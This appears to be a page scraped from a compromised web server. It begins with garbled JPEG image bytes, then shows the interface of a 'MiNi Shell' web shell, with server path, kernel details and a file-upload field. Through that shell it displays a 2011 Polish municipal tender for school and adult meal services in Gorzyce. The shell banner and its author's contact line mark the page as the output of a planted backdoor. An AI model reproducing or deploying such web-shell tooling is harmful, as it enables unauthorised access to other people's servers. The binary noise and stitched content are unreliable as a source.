JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111124/394858-N-2011.html

<p class="kh_header"><b>Gorzyce: Dożywianie dzieci w szkołach i osób dorosłych na terenie Gminy Gorzyce w roku 2012</b><br>
<b>Numer ogłoszenia: 394858 - 2011; data zamieszczenia: 24.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Raciborska 27, 44-350 Gorzyce, woj. śląskie, tel. 32 45 11 671, faks 32 45 11 671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opsgorzyce.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie dzieci w szkołach i osób dorosłych na terenie Gminy Gorzyce w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I. 
1.1 Przedmiotem zamówienia jest przygotowanie i dostarczanie posiłków na dożywianie dzieci w szkołach na terenie Gminy Gorzyce. 
Prognozowana liczba dzieci objętych dożywianiem wynosi 38. Średnioroczna szacunkowa liczba posiłków dla dzieci w szkołach wyniesie 6 992 szt. Dożywianie dzieci odbywać się będzie od poniedziałku do piątku w dni nauki szkolnej poczynając od 2 stycznia 2012 r. do czerwca 2012 i od 2 września 2012 do 21 grudnia 2012
Przedmiot zamówienia na dożywianie dzieci w szkołach obejmuje 5 szkół z terenu Gminy Gorzyce.  Prognozowana dzienna ilość posiłków dla poszczególnych szkół wynosi : 
Szkoła Podstawowa im. Wincentego Woźniaka w Czyżowicach - 7 
Szkoła Podstawowa nr 2 w Gorzycach (Kolonia Fryderyk) - 7,
Oddział Przedszkolny przy Szkole Podstawowej nr 2 w Gorzycach (Kolonia Fryderyk) - 7
Szkoła Podstawowa Rogów - 12, 
Gimnazjum w Rogowie - 5, 
1.2. Usługa będzie polegała na przygotowaniu, dostarczeniu i wydaniu w w/w Szkołach posiłków w następującej formie : 
1.2.1 gorący dwudaniowy posiłek składający się z ; 
a/ zupa o obowiązującej gramaturze posiłku : - zupa -350 ml. 
b/ mięso lub jego porcja + ziemniaki, kasza lub ryż + surówka + napój lub kompot. Ustala się obowiązująca gramaturę posiłku : 
- mięso lub jego porcja - 100 gram 
- ziemniaki - 150 gram 
- lub kasza, ryż ( zamiennie ) 100 gram 
- surówka - 100 gram , 
- napój lub kompot - 200 ml. 
1.3. Za danie z mięsem, jeden raz w tygodniu posiłek mogą stanowić np.: pierogi, naleśniki z serem, krokiety lub danie z makaronem o minimalnej gramaturze - 200 gram + napój lub kompot 
1.4 Zamawiający nie dopuszcza aby w ciągu jednego tygodnia (5 dni nauki szkolnej) wystąpiła powtarzalność tego samego dania lub zupy. 
1.5 Posiłki przygotowane przez Wykonawcę pod względem technologii wykonania i jakości , spełniać muszą normy określone przez Instytut Żywności i Żywienia Dzieci i Młodzieży. 
1.6 Posiłki muszą posiadać wymaganą przepisami kaloryczność i muszą być sporządzone zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Muszą być wykonane ze świeżych produktów spożywczych posiadających aktualne terminy przydatności do spożycia. 
1.7 Wykonawca będzie zobowiązany do przygotowania i przedstawienia zleceniodawcy (Dyrektorom Szkół i Kierownikowi Ośrodka Pomocy Społecznej w Gorzycach) z co najmniej tygodniowym wyprzedzeniem, jadłospisów dotyczących dożywiania w poszczególnych dniach. 
1.8 W okresie dożywiania liczba posiłków może ulegać zmianie tj zwiększeniu lub zmniejszeniu do 20 %. 
1.9 Godziny dostarczenia posiłków Wykonawca ustali z Dyrektorami poszczególnych szkół. 
1.10 Przygotowanie i dostarczenie gorących posiłków powinno być wykonywane przez kadrę posiadająca wymagane kwalifikacje zawodowe oraz w oparciu o bazę kuchenną do sporządzania posiłków. 
1.11 Posiłki będą wydawane na terenie Szkół. Posiłki Wykonawca będzie dostarczał we własnym zakresie, na własny koszt środkami transportu przystosowanymi do przewozu żywności, spełniając przy tym wszelkie wymogi sanitarno - higieniczne, we własnych specjalistycznych termosach gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw albo  dostawa może odbywać się także w jednorazowych naczyniach zapewniających właściwą ochronę i temperaturę. 
1.12 Wykonawca zapewnia naczynia i sztućce do spożywania wydawanych posiłków . 
1.13 Wydawanie posiłków leży po stronie Wykonawcy. 
1.14 Wykonawca będzie ponosił koszty załadunku i rozładunku wszystkich dostaw posiłków oraz wydawania wszystkich posiłków w szkołach a także koszty i odpowiedzialność za czystość używanych termosów i naczyń wielokrotnego użytku, jeśli takie będą używane.
1.15 Informacje o zmianach w liczbie dostarczanych posiłków lub dodatkowych dniach wolnych od nauki szkolnej Zamawiający (Kierownik Ośrodka Pomocy Społecznej w Gorzycach lub osoby przez niego upoważnione ), jest obowiązany przekazać do Wykonawcy w terminie z co najmniej 3 dniowym wyprzedzeniem .
Zadanie II.
2.1. Przedmiotem zamówienia jest przygotowanie i dostarczanie posiłków dla osób dorosłych  na terenie Gminy Gorzyce. Prognozowana liczba osób dorosłych objętych dożywianiem na terenie gminy Gorzyce wynosi 11. Przewidywana średnia liczba posiłków w roku 2012 wyniesie 2 196 szt. Dożywianie osób dorosłych odbywać się będzie od poniedziałku do piątku w godzinach pomiędzy 10.00 a 15.00. w następujących miejscowościach:
Gorzyczki - 1 osoba,
Gorzyce - 1 osoba
Gorzyce Osiny - 2 osoby,
Olza - 3 osoby,
Turza Śl. 1 osoba
Kolonia Fryderyk - 2 osoby
2.2. Usługa będzie polegała na przygotowaniu i dostarczeniu dwudaniowych posiłków do mieszkań osób uprawnionych zgodnie z wykazem.
2.2.1 Posiłek dwudaniowy powinien składać się z: 
a/ zupa - 500 ml, pieczywo (1 bułka lub 2 kromki chleba ),  

b/ drugie danie - mięso lub jego porcja + ziemniaki, kasza lub ryż + surówka. 

Ustala się obowiązująca gramaturę posiłku : 
- mięso lub jego porcja - 100 gram 
- ziemniaki - 250 gram 
- lub kasza, ryż ( zamiennie ) 250 gram 
- surówka - 100 gram , 
2.3 Dwa razy w tygodniu zamiennikami dań mięsnych mogą być dania jarskie np.: pierogi, naleśniki z serem, krokiety lub danie z makaronem o minimalnej gramaturze - 500 gram 
2.4 Zamawiający nie dopuszcza aby w ciągu jednego tygodnia wystąpiła powtarzalność tego samego zestawu obiadowego. 
2.5 Posiłki przygotowane przez Wykonawcę pod względem technologii wykonania i jakości, spełniać muszą normy określone w ustawie o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2010 r. Nr 136, poz. 914 z późn. zm. ) łącznie z przepisami wykonawczymi do tej ustawy.
2.6 Posiłki muszą posiadać wymaganą przepisami kaloryczność i muszą być sporządzone zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Muszą być wykonane ze świeżych produktów spożywczych posiadających aktualne terminy przydatności do spożycia. 
2.7 Wykonawca będzie zobowiązany do przygotowania i przedstawienia zleceniodawcy z co najmniej tygodniowym wyprzedzeniem, jadłospisów dotyczących dożywiania w poszczególnych dniach . 
2.8 W okresie dożywiania liczba posiłków może ulegać zmianie tj zwiększeniu lub zmniejszeniu do 50 %. 
2.9 Godziny dostarczenia posiłków : od poniedziałku do piątku pomiędzy godziną 10.00 a 15.00
2.10 Przygotowanie i dostarczenie gorących posiłków powinno być wykonywane przez kadrę posiadająca wymagane kwalifikacje zawodowe oraz w oparciu o bazę kuchenną do sporządzania posiłków. 
2.11 Posiłki dla osób dorosłych będą wydawane w ich miejscu zamieszkania. Posiłki Wykonawca będzie dostarczał we własnym zakresie, na własny koszt we własnych specjalistycznych termosach gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw. 
2.12 Dostawa musi odbywać się w jednorazowych naczyniach zapewniających właściwą ochronę i temperaturę oraz środkami transportu przystosowanymi do przewozu żywności, spełniając przy tym wszelkie wymogi sanitarno - higieniczne.
2.13 Dostarczanie posiłków leży po stronie Wykonawcy. 
2.15 Informacje o zmianach w liczbie dostarczanych posiłków Zamawiający (Kierownik Ośrodka Pomocy Społecznej w Gorzycach lub osoby przez niego upoważnione), jest obowiązany przekazać do Wykonawcy w terminie z co najmniej 3 dniowym wyprzedzeniem ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Do 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.52.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opsgorzyce.pl/ogłoszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej ul. Raciborska 27, 44-350 Gorzyce - Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2011 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej ul. Raciborska 27, 44-350 Gorzyce - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com